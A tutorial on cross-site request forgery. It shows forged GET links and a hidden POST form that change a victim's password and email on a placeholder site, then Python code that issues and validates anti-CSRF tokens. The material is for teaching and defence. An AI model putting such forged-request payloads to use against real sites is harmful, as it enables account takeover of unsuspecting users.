CSRF is an attack that forces a victim user to perform unwanted actions, such as transferring funds or changing a password or email address.
It is all about performing an action that we cannot do ourselves but that our victim has the privilege to do (e.g. changing his own password).
There are several approaches to this attack, but first we have to know how to generate a valid malicious request so that we can trick our victim into launching it.
So first we will attempt to change our own password to Very $ecret in our account and look at the request:
GET /change_password/?new_password=Very%20$ecret HTTP/1.1
Host: website.com
Now we will embed the following URL in our malicious website, with the password we want to set:
<a href="http://website.com/change_password/?new_password=Hacked!!!">Click Me!</a>
Once the victim clicks it, the browser sends the request with the victim's session cookie, changing his password to the one we chose!
Let's see another example, this time with the POST method. Assume we want to forge the following request:
POST /profile/edit HTTP/1.1
Host: website.com

email=Hackers_Email@hacker.com&password=Hackers_Password
So we will have to embed the following HTML in our malicious page:
<form action="http://website.com/profile/edit" method="POST">
  <input type="hidden" name="email" value="Hackers_Email@hacker.com"/>
  <input type="hidden" name="password" value="Hackers_Password"/>
  <input type="submit" value="Click ME !"/>
</form>
Once the user clicks it, the email and password are changed to the ones in the request.
The anti-CSRF token is a random value supplied by the server for each client; it must be sent from the client back to the server and validated by the server on every state-changing request. It is usually a POST or GET parameter, but it can also be an HTTP header.
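To show how the token defeats the forged requests above, here is an added example (not from the original page) of a server issuing a per-session token and checking it on the /change_password action. The in-memory SESSIONS store, the csrf_token field name and the X-CSRF-Token header name are assumptions for the illustration.

```python
import hmac
import secrets
from typing import Dict, Optional

# Hypothetical in-memory session store: session_id -> session data.
SESSIONS: Dict[str, Dict[str, str]] = {}


def issue_csrf_token(session_id: str) -> str:
    """Generate a fresh random token and bind it to the user's session.

    The server embeds it in every state-changing form as a hidden input,
    or hands it to client-side code to send as a header.
    """
    token = secrets.token_urlsafe(32)
    SESSIONS.setdefault(session_id, {})["csrf_token"] = token
    return token


def validate_csrf(session_id: str, form: Dict[str, str],
                  headers: Dict[str, str]) -> bool:
    """True only if the request carries the token bound to this session.

    A page on another origin cannot read the victim's session or page
    contents, so a forged request cannot supply the right token.
    """
    expected = SESSIONS.get(session_id, {}).get("csrf_token")
    if expected is None:
        return False  # no token was ever issued for this session
    supplied: Optional[str] = form.get("csrf_token") or headers.get("X-CSRF-Token")
    if not supplied:
        return False  # forged requests typically omit the token entirely
    # Constant-time comparison avoids leaking the token through timing.
    return hmac.compare_digest(expected.encode(), supplied.encode())


def handle_change_password(session_id: str, form: Dict[str, str],
                           headers: Dict[str, str]) -> str:
    """Simulated /change_password handler that rejects requests without a valid token."""
    if not validate_csrf(session_id, form, headers):
        return "403 Forbidden: missing or invalid CSRF token"
    SESSIONS[session_id]["password"] = form["new_password"]
    return "200 OK: password changed"


if __name__ == "__main__":
    # Constructed sample: the legitimate form carries the token, the forged one does not.
    sid = "session-abc"
    token = issue_csrf_token(sid)
    print(handle_change_password(sid, {"new_password": "Very $ecret", "csrf_token": token}, {}))
    print(handle_change_password(sid, {"new_password": "Hacked!!!"}, {}))
```

Even with the token in place, state changes over GET (as in the first example) remain a design flaw, since the URL ends up in logs, history and Referer headers.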